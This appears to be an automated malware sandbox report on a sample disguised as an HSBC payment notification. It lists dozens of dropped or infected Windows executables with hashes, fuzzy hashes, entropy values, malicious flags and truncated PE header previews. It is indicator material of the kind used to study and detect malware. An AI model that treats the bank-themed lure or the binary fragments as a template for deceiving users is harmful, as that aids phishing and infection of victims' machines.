SHA-512:552B6F088EFFDEEC4796478BEFB22AB58CF3E6535BF9A887A718B30787B095F3CF4A8DA34188AC9EBB6F63EC2BFFB208B50D825C464EFE5FB7851789C3FBD3B3
Malicious:true
Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3141
Entropy (8bit):4.850973511586367
Encrypted:false
SSDEEP:48:Ftk5yVQ+aGR73/R3mqZ1DYTSc3YvHsx3L3Q+ai3qfCT+F+Y3N3n3M3D:MiPT0Eo
MD5:99B30E1686AA32F919388B41997F5283
SHA1:360B79445D56BDACB9A45657860E155A616307BC
SHA-256:50B1564D7F65FC29E34A2154A3B12646CA6562B50B13E08E1B4F22C89848B008
SHA-512:E0F3E97CBC4F4F5412CCF1DD2F575C9C5851732D534E1AD18E5D123A25EE77931869648B4EF2DB6C1BF70A536561499389ABAC313B9E7B4D55666BA1B4146238
Malicious:false
Preview:2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeAuditPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeBackupPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-12-11 03:26:10-0500: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeDebugPrivilege...2024-12-11 03:26:10-0500: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-12-11 03:26:10-0500: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-12-11 03:26:1
Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1512448
Entropy (8bit):4.897853118697728
Encrypted:false
SSDEEP:24576:OQVTZu0Jy/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:VVTZujLNiXicJFFRGNzj3
MD5:E7E89E8BD2CB902CA372DA1022670BE2
SHA1:46A2E53AC4CC55D5F1E116CAA4D87B9DB6D15BF3
SHA-256:392C14E0CE516E6A26939EF8CF20A4688A1514DAA4E9D252D492665192FB0AC5
SHA-512:5D36E2E5C7B4BE6E5DB855309BF6A6C50F1BEB5DA75767EEC6BA47B644901ED9253B964B57F75DD660594DE4A9C6FA6B1FF6582FAFAE2B5D7CF7AF0C4537A9C4
Malicious:true
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1839616
                                                                                                                                                                              Entropy (8bit):5.246010732446611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:O+gkEdfh4CoK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DgkE5SMLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:368CA82848F6F261B436ECCE5B82BFD5
                                                                                                                                                                              SHA1:8EACB4C23CDA00489285B3B452F953E79C53EA7B
                                                                                                                                                                              SHA-256:02C3474B6DAED79AF185CBC451F7FF6E944579036226EEDE7E647A3347144D5F
                                                                                                                                                                              SHA-512:CACD4E93FD6AB35FA71160545993114E2DA93D760C342D3EA01193FDF3389F7747023D8EFDEFEE460E0D46D2B5211EBC54A1D87BE5782A5C758B9B20ECAE060E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@..............................0'........... .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...`...........r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1532416
                                                                                                                                                                              Entropy (8bit):7.089465496150162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:vBpDRmi78gkPXlyo0Ghjr5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5NRmi78gkPX4o0Ghj9LNiXicJFFRGNzb
                                                                                                                                                                              MD5:7301987D4866A57620C7C41334262EFF
                                                                                                                                                                              SHA1:BDE98A248648184BF5900E59ED0438DDA88F1E3A
                                                                                                                                                                              SHA-256:C3F59BC9F6A4A9337DC3981DB439242B36EA3E078B35996E00845086609A291B
                                                                                                                                                                              SHA-512:928BB299F1D3975A18E6F257852A908E106BCEF6D48EF50389DCBFCEB198FCBB5BC8ED91F6E88D4DB36B5C75F97A072A6039B4D6D185EE3938376085134D07F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\..2..2..2.0.\..2..I..2..3..2..O..2..\.D.2...6..2.._..2..N..2..J..2.Rich.2.........................PE..d....\.d.........."......b...8......Pi........@.....................................?[.... .................................................P................... .......................................................................(.......@....................text....a.......b.................. ..`.rdata...i.......j...f..............@..@.data...............................@....pdata.. ...........................@..@.rsrc...............................@..@.reloc...............r..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1282048
                                                                                                                                                                              Entropy (8bit):7.220006533178592
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:gLOS2oPPIXVK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Y/PVLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:30354F505A3544DE92077D55CEE17592
                                                                                                                                                                              SHA1:EC045EF16CD54DB666AB17BD4325CA2DBDBCD7E5
                                                                                                                                                                              SHA-256:96DEBB7C1C7848B680CD0E26D854041E5A135FD698B6C31B9D6A4E7F5BD45797
                                                                                                                                                                              SHA-512:5BB9E6A6B1152BD4317C2721D203B5A33B1DA9F1FAAC3CA9EF8BC460BB26553EED73491AAAF60E52D85AE53DBB4F9B8BD553CCA47933ECCD80B80D4BA5A128F5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.VS.y8..y8..y8...C.jy8..y9..y8...E.}y8...V..y8.i.<.~y8...U.ky8...;.~y8...D.~y8...@.~y8.Rich.y8.........PE..d....\.d.........."......&..........."........@.....................................]L.... ..............................................................d...........................................................................@...............................text...4$.......&.................. ..`.rdata..Ts...@...t...*..............@..@.data...83..........................@....pdata..............................@..@.rsrc....d.......f...:..............@..@.reloc..............................@...........................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1300992
                                                                                                                                                                              Entropy (8bit):4.528924873984924
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:iYs/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:732FE6A2C96F468F5E997F69083BC390
                                                                                                                                                                              SHA1:003CF03856AADDAA4E36C72CA3CE32EE10049EA1
                                                                                                                                                                              SHA-256:A65DA35A64E049D3D1104ED4F68836BED9193226ABFCA112897231335952C8BE
                                                                                                                                                                              SHA-512:8DBDB471757648EE64C629E10529C9CEDBC8B14F793F21AF95FF5530A8BAF85F05A89BB64D404E0F734E1DE98C2766A96D7D7863DFB566F35531D387DA7D8B3A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../..........@......f!.......0....@..................................&......................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc....p...`.......*..............@...........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1222656
                                                                                                                                                                              Entropy (8bit):6.698830301231591
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ctdzT/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ctd3LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3550D1EE9304CF5CCEBC0CA775412CC7
                                                                                                                                                                              SHA1:C46B220E5D817A108F4D365A2BE74D19A940A0E2
                                                                                                                                                                              SHA-256:0C182EBEF2EF9930308B0487CB8118FFDA3E40E525F5C6C505A39136E7108CDA
                                                                                                                                                                              SHA-512:04889F6D56756C381C30D76F6C19F9F8EC1E11E6280ACB5AD0BB776F8C14B5D4950356373D3D04C533FED792AB9A6317C9A7D8B62CD556D96074ADB442C001C2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U...4.F.4.F.4.F.LEF.4.FE@.G.4.FE@.G.4.FE@.G.4.FE@.G.4.F._.G.4.F.4.F%4.FG@.G.4.FG@)F.4.F.4AF.4.FG@.G.4.FRich.4.F................PE..d......d.........."......6.....................@....................................>..... .....................................................|....P..h........9.....................p.......................(...P...8............P...............................text....4.......6.................. ..`.rdata..>....P.......:..............@..@.data...............................@....pdata...9.......:..................@..@.rsrc...h....P......................@..@.reloc..............................@...................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1613312
                                                                                                                                                                              Entropy (8bit):4.676579677588059
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:tv7iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                              MD5:05477127459FCFBF43B3487264CE8C85
                                                                                                                                                                              SHA1:2A8D3E4E2810DD2FE2DE869083B009E710631560
                                                                                                                                                                              SHA-256:F1FDE08818DB93FF2EBFDCCE4F910E3E92CF4706D5DFC3EC2819D040019EF5D1
                                                                                                                                                                              SHA-512:71CBFBAE95D98D0DE51A03CF514641F4B4BD5936393C467206D8384DE60D3AA071A89B86E60508D20096B7A3627178EAE498B8DE1693FBD2C682BF94CA9F27C7
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]../...|...|...|B..}...|B..}...|...}...|..S|...|..}=..|..}...|..}...|..}...|..=|...|o..|...|B..}...|...|...|..}...|..Q|...|..9|...|..}...|Rich...|................PE..d......d.........."......H...........&.........@..............................#.....V..... .................................................@...,....@..........4......................T.......................(...@...8............`...............................text....G.......H.................. ..`.rdata.......`.......L..............@..@.data...............................@....pdata..4...........................@..@.CRT....@....0......................@..@.rsrc........@......................@..@.reloc...`...P......................@...................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1616896
                                                                                                                                                                              Entropy (8bit):5.043545248005107
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:I5zhM1XSF+/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WMs4LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:F96197E378B8DEA63548E27A09CA290D
                                                                                                                                                                              SHA1:BF796A1DD2088ABC027A4296C565438584A93C74
                                                                                                                                                                              SHA-256:3B47F9CB7EA657020A29D5D82C86A89AC9FF48B0402F2BD4EC2FBCC4407C19AA
                                                                                                                                                                              SHA-512:910F8AB6B725FB824FA38A6EAE3EFF1DE91A501E44FC6D02A4C423D83BD3243FD30D44DC114E6CE526A99E5342FAAD37ABD9DEB78C66815BD9E46930DE600C00
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........<$.Rw.Rw.Rw...w..Rw5.Vv.Rw5.Qv.Rw5.Sv.Rw7.Sv.Rw..Vv.Rw..Tv.Rw..Sv..Rw.Sw..Rw5.Wv.Rw.t/w.Rw.t?w..Rw7.Wv.Rw7.Vv.Rw7.w.Rw..w.Rw7.Pv.RwRich.Rw........PE..d......d.........."..........z......@..........@..............................#......X.... ................................................. A...................+......................T.......................(.......8............................................text............................... ..`.rdata..............................@..@.data....d...`...\...T..............@....pdata...+.......,..................@..@.rsrc............0..................@..@.reloc...`...0......................@...........................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4151808
                                                                                                                                                                              Entropy (8bit):6.4967525273461275
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:ttuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755BLNiXico:tjEIa3HIEWOc537wRGpj3
                                                                                                                                                                              MD5:AF7DEEF6D236E86DAC47FBB5D43F86C3
                                                                                                                                                                              SHA1:C21F97E781EAB62758E66D2E30A70CCBE2C58855
                                                                                                                                                                              SHA-256:4A579C1566E4BB29706D6E0C923B8AA8E0C305D94CD1F2D0D56D0F933B02021E
                                                                                                                                                                              SHA-512:989A44D5D1149B55ACF699B6020B5D85418A8ADB63AE1598937F99B456A77FCCE25466A800821975979FE8751A2AACAED6AD679AB5CE480532BF02E7EC547460
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........x...............r.......r.......r.......v$.....>m......>m......>m.......r...............r..............<m......<m......<m&.......N.....<m......Rich............................PE..d...<..d.........."......:....................@............................. @.......?... .........................................0.%.......%......0)......p'.......................!.T.....................!.(....s .8............P......l.%......................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data....D... &.......&.............@....pdata.......p'.......&.............@..@.didat........).......(.............@..._RDATA....... ).......(.............@..@.rsrc........0).......(.............@..@.reloc...@....6..0...*6.............@...................................................................................................................
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.9993539358225565
Encrypted:true
SSDEEP:1572864:DQb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:UXhwMhe6AABPiQwF6xQ22R
MD5:7D9272BA19C6187F7EA6BA616B033401
SHA1:79C5220D3D7B28489AA22F59EA7CD22C2DD7302A
SHA-256:C1EDC68F0C4756166E902AEE653A5057C528B9DB9033A22E5586B91681D406EA
SHA-512:DC109945C72111C6231E94187849102AE9482F909B1C421A312F29F8A0F7B405223707333560FA3E46B6ECB0F4931B60C894E22B44C4CCC30C61AD55D3E0D2E8
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1335808
Entropy (8bit):4.5926073767735405
Encrypted:false
SSDEEP:12288:bWuiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:b5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:FB9A74EADCE0471F17AA7B219782D8DC
SHA1:22B886AAE749CF5337BF599BF3BF9792146E66E6
SHA-256:3E2396B0B125D8A7D7D3D11E1915B80AA78B0B1F377FCA0A81E0E2E6F6EC4904
SHA-512:A5DC89BCD6E62537922A7EEA808551B29C208323B0EDC4F96BF865A6FEC6D39AE5E7568582C8F58CFC83B13F2CA7C8AA74E2E2ED6EB58603E4DAC406B986F6C1
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.384606490793524
Encrypted:false
SSDEEP:49152:YDvZEaFVUn+Dpasot2xQevgjCGT7lmPIionqOgBhGl6zVLkVEk3yV07U24GEQTX5:hnN9KfxLk6GEQTXsUKzNDE7wRGpj3
MD5:E37900F2DD8FBB641F34AD7B59BBD568
SHA1:A4D4241605FD011631016A56D6E942B13BEF162F
SHA-256:DCB951F619C5908B8FCF5766EEAAC810834C7D8CBA53D79B7D07FC5E3BDAA219
SHA-512:5BEB55BD4B28262BACCBFA091E39BA1A93D42C2C2C073A48A8ACCB69DC25661CC74167A4F5C7E2D8211D568A86C88E2F2F7089A3A07CDA0874312E573A992C2D
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1312768
Entropy (8bit):4.543832291208859
Encrypted:false
SSDEEP:12288:KciJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:Km/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:085A0AAF739902D063C7AE31FD06723D
SHA1:EFCCAE80BA84AF94923F3B7F5EA83BEBFA4ACA80
SHA-256:04B5D09177D653D51E9E1E467B699AF5CF5E3CD9E718445D5F9F818BFA37C61A
SHA-512:3B8D7FF54AFAF70C9BAEBF95AFD32F0F8E9B731287F114CF284FAFEFBB4EE22655E2334763256CAE58F203F5856C116AB11795EDF2651B90B5A843A03B73F668
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):12039168
Entropy (8bit):6.595650840341115
Encrypted:false
SSDEEP:98304:Ob+MzPstUEHInwZ33RBk9DdhgJCudq1uVIyESYgKR7wRGpj3:4nPgTHIwZnRBk9DdhSUEVIXgK1F9
MD5:F759F6B5B872CF0375664C1C735EC533
SHA1:20EE7B32E5E79BB2951755DDF1EF2D1F1AED3E2E
SHA-256:FF3298B05D9925C94DD4A246B66CAE5D3E397CCAFB4338E7DDBD7647D8350874
SHA-512:86DE3B8C5EEFE568C35AABAC71E16C3DE9A0D2846213550B5E5F81CCB0C7CC649DCB02FA779414098EF1D37A38202A79BD45884D45664C0B394024E57D697699
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1478144
Entropy (8bit):4.8260519636928585
Encrypted:false
SSDEEP:24576:Fg5FvCPcsB/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ifH6LNiXicJFFRGNzj3
MD5:C968A699636143F38556D5EA87228769
SHA1:CB28578AE39FF8C1F7943812596173CD7705BD6A
SHA-256:B581F6AE0EE8EF1DA1F9235BDFE1140737C384262D010123AB274B29549CDB42
SHA-512:7AE2ACFBE8BA30345F87F85ED6DF52BE40473E87F9B0222E26015F8690E37BF60517CDBD63584497D50024B66AB5BCAF3EE1A43D698039774439CE49B8C28AEA
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1339904
Entropy (8bit):7.200175627712454
Encrypted:false
SSDEEP:24576:gjKTIsAjFuvt9fmFthMaT5U8aChaeu7/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gjI/mPh7TT79iLNiXicJFFRGNzj3
MD5:727E39F266A3BA5A485C006CFF6619DA
SHA1:FDAEA4FF9D52F4AAB053E469CEB92635893A0A88
SHA-256:789548D22CA9B4851693531F7859FB446E8C4DACF5D3F4BBE077711080134A4F
SHA-512:6160FA6EDD62F79E0CF1726513FE96EB250C06705D08AE526733841FBD0168E428C8658013A2777FD0CECB40DE28B4BE3D3A98DA6E4A008C2A48628BE9374B43
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1671168
Entropy (8bit):5.004971773462536
Encrypted:false
SSDEEP:24576:0GqVwCto1Om5WgP/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:BZ1OmUULNiXicJFFRGNzj3
MD5:934D3A044297EE0F41F82FF13767B8D6
SHA1:CAFDD2AD6A43E240EEB5E126C941ABA038567A79
SHA-256:533B6D66DC6AE173C76E824A7369B70FEFA34CBCCD775FCCCC0A41EBABFDEEA0
SHA-512:3F5233F368CD2B196F5261175499D898BA6467D0DABBD8AE8B2A247F207B3ABD79EAAA4538EFE7C57D9B1F1A326991E01A69F26A7FA3880F20DFD575089D2D5E
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1409024
Entropy (8bit):4.686416949757264
Encrypted:false
SSDEEP:24576:xWBW1/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5LNiXicJFFRGNzj3
MD5:8D4072606BDF58C2431CDD04A36B5535
SHA1:7E8F8AF3E5B5157D614858980EB03076F6D36587
SHA-256:E3EFEE65424F112466BD07D290C02F2C9C6126D4ADEBA1A0B72E79F43556CBB8
SHA-512:25A85D1EA0A1851E9B8281FD286D0516471C2C7B21955750974F91A0885818E8786585225DBD4A0D6B5E5A8195718FC0CBE898747D60F991B4940FBC32371AB4
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1683968
Entropy (8bit):7.221664439331996
Encrypted:false
SSDEEP:49152:1+GtCi27mVdyT+a0wLNiXicJFFRGNzj3:gmd27V7wRGpj3
MD5:C415552EC2A6B5BFCEA33A64B495E02B
SHA1:E536DC8FD5FABA576E46432349A77A3DAD960962
SHA-256:A79A214DF84D47833AA9811E920F5C4231024CDF56C3926A9131208666CFEC06
SHA-512:94BD3B5E4E8546826AC0A4F5256C799D88F197B086BD461FB1CB1D76B36CEA822F3BF5BCFAF09E0027EAFB3F0F9B65529B3A11C85E487AA48A2D4A6BBA478516
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):3110912
Entropy (8bit):6.646865976457307
Encrypted:false
SSDEEP:49152:qU198PzqkltcT0gViqNfBZQiOIK5Ns6YZ82PTJeYXLNiXicJFFRGNzj3:/9NfHOIK5Ns6qR9F7wRGpj3
MD5:8E240A7B27C75AD1D69838DB06958AF4
SHA1:A149B03F00C79CE9522C26565FCC5C6DAA8ADF6B
SHA-256:0EA6577A2F85CC8D19494680EAD72822B913C4EFEB14DEF1FF6450FD70E9521C
SHA-512:93FB85B56E7A5610214AD12AA9549EA0763DCCF3E0860E8641B4D9E06D21BD305A9FC3CB9EF23E1D463CB0332F41E0AC5778B943F083A05A06A1BB24ECAED95E
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1743872
Entropy (8bit):5.136839309159564
Encrypted:false
SSDEEP:24576:okIWTUQcydf/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oxKUoLNiXicJFFRGNzj3
MD5:D1401D18952F3A041A991A5BBD39B8C7
SHA1:767348545997D3C61C542F803637759E79BB4FE3
SHA-256:AA03FB3303F0DA6DFC70D3C007097F9C72919346F455024F7159C269067FC190
SHA-512:409ED5C57C231A404983F0A400F6906664C81545274721FE010684155C0EDC07C64BE5EF4474DC6BD882017B4E42C4854D4DC7AEF5B5D5BCF665FF17A2117BED
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1494016
Entropy (8bit):4.896119933788027
Encrypted:false
SSDEEP:24576:wO+qBg/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:n+LLNiXicJFFRGNzj3
MD5:62976C5C4E6A3FBA1D3DB8464B64C3D8
SHA1:60749729AD2BDAF8C0AD29CC03F11EECA28055A7
SHA-256:15813347AA1DCD1CD33099DE0056E519F3D1BCF224260494C77F8EB5885421FF
SHA-512:7D089DDAB1EE902681A8F17F047441AD36D44F577B46E3580EC0BF9415BDB03081B447C1AF150D47C46069480B82EBBC077EA7AFB69151E033CA0557825A6E89
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1298944
Entropy (8bit):4.521168423763117
Encrypted:false
SSDEEP:12288:xiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:4AE3FB28F13C0B8D59FDD376127B6466
SHA1:5E893B74C40E2249B169493426BEA7A9C48D8ECF
SHA-256:9484E6E4CB76231A91A4FC7CDEEE88BB4DA96FE9080CA2FFE77A80BD9CE2ECDC
SHA-512:2C3E58814B929891CAD1113689F726B659B0396C77EA62CE16E7C82F1250FF56834647CD4A12CCF052FC8D493CCCA1EA1533619CD45AA9A2E890F5F4B7F6F218
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1317376
Entropy (8bit):4.550856070012462
Encrypted:false
SSDEEP:12288:WQiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:N/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:AF91E3A41B842D2EF0FDA4440F34B353
SHA1:EBC85DD235F6F7208DF05723B394F523BBDE4FB3
SHA-256:2ED40CC4945D9CF747E4ADD481D9F1BB234EBF515B558760CA06405878408E0E
SHA-512:C2E5C83330AD17CDBD7526EB90AB8B984808A5CF190DA669349627FD3DD957D45AA310209A668A54414E58F48D4CB4C62EC336C9889E05AD6D025EC23CEB50A1
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.496752054663036
Encrypted:false
SSDEEP:49152:4tuUC0nNc/RcYHCY9AWWnUOqdHIEogMAYrukdUmSC+bXMZQU1QqpN755BLNiXico:4jEIa3HIEWOc537wRGpj3
MD5:585F851F56A08D2E9CCB2412E6E896D2
SHA1:201C52A3BB12700D9FC697811C101E0DDE598280
SHA-256:9896FF33EB31B9A3445429651845443376E8D54405C06689B7BF40421FB5D70A
SHA-512:E808E667D7F7FAB2B76030D14D876B3CF0966E6D76ADFB194CB65933C4A41832FE28B2B11ED3BC21AD77FD41006C21B82E72F9B91B588028EF27A90DA4482DB2
Malicious:true
Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999353935985061
Encrypted:true
SSDEEP:1572864:0Qb5m2CYw2bheyHA2DiAVPNqCPiQwm9tqGWS15Vj9QVqd2+NAs:rXhwMhe6AABPiQwF6xQ22R
MD5:29A631C6E5A948476AFAE5EA442AD819
SHA1:ABD38E463E5A1BAAB3B9BC0BA48040AC4EB8ED50
SHA-256:628651BC82636909E174044C5B10733AF07890B2EBF99B08D243A8235090E035
SHA-512:8DD7BDDA5F49051D450350A20910C7FBD407E895D2767FE38F73AFA0F5998EFD118568AD96E87B737919561100DF90EFDD60BCFF75C9882FFBD982D0F704F4F2
Malicious:true
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1385984
                                                                                                                                                                              Entropy (8bit):4.7034590142747135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:IjkYuE/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:s/uELNiXicJFFRGNzj3
